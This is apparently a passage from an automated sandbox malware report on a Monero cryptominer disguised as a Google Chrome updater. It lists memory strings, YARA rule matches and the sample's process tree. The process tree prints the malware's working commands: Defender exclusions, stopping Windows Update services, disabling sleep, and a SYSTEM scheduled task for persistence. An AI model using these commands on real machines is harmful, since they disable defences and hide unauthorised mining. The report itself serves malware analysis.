      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
      Source: lsass.exe, 00000016.00000002.5693861980.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435955395.00000207AA10A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
      Source: lsass.exe, 00000016.00000000.4436179349.00000207AA14C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4486695225.00000207AA023000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435021469.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5670096986.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693012290.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA14D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433108426.00000207A9660000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4611401089.00000207A9E3C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
      Source: lsass.exe, 00000016.00000002.5671170821.00000207A96A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433366275.00000207A96A4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5683001175.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
      Source: powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocert.com
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4436179349.00000207AA14C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4486695225.00000207AA023000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435021469.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5670096986.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693012290.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435955395.00000207AA10A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: lsass.exe, 00000016.00000000.4436179349.00000207AA156000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA156000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsof
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustock
      Source: powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/am
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
      Source: lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
      Source: powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
      Source: powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz
      Source: powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0

      Operating System Destruction

      Source: C:\Program Files\Google\Chrome\updater.exe | Process information set: 01 00 00 00
      Source: C:\Program Files\Google\Chrome\updater.exe | Process information set: 01 00 00 00

      System Summary

      Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED | Matched rule: Detects coinmining malware Author: ditekSHen
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\svchost.exe | Process Stats: CPU usage > 6%
      Source: C:\Windows\System32\dialer.exe | Process Stats: CPU usage > 6%
      Source: C:\Program Files\Google\Chrome\updater.exe | File created: C:\Program Files\Google\Libs\WR64.sys
      Source: C:\Program Files\Google\Chrome\updater.exe | File deleted: C:\Windows\Temp\kkldhmzqxige.tmp
      Source: Joe Sandbox View | Dropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
      Source: kkldhmzqxige.tmp.0.dr | Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Source: updater.exe.0.dr | Static PE information: Number of sections : 11 > 10
      Source: test2.exe | Static PE information: Number of sections : 11 > 10
      Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@67/65@19/0
      Source: C:\Users\user\Desktop\test2.exe | File created: C:\Program Files\Google\Chrome\updater.exe
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8080:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5152:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6500:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1184:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1184:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5152:120:WilError_03
      Source: C:\Users\user\Desktop\test2.exe | File created: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp
      Source: test2.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\powercfg.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\sc.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Users\user\Desktop\test2.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: test2.exe | Virustotal: Detection: 54%
      Source: C:\Users\user\Desktop\test2.exe | File read: C:\Users\user\Desktop\test2.exe
      Source: unknown | Process created: C:\Users\user\Desktop\test2.exe "C:\Users\user\Desktop\test2.exe"
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: unknown | Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
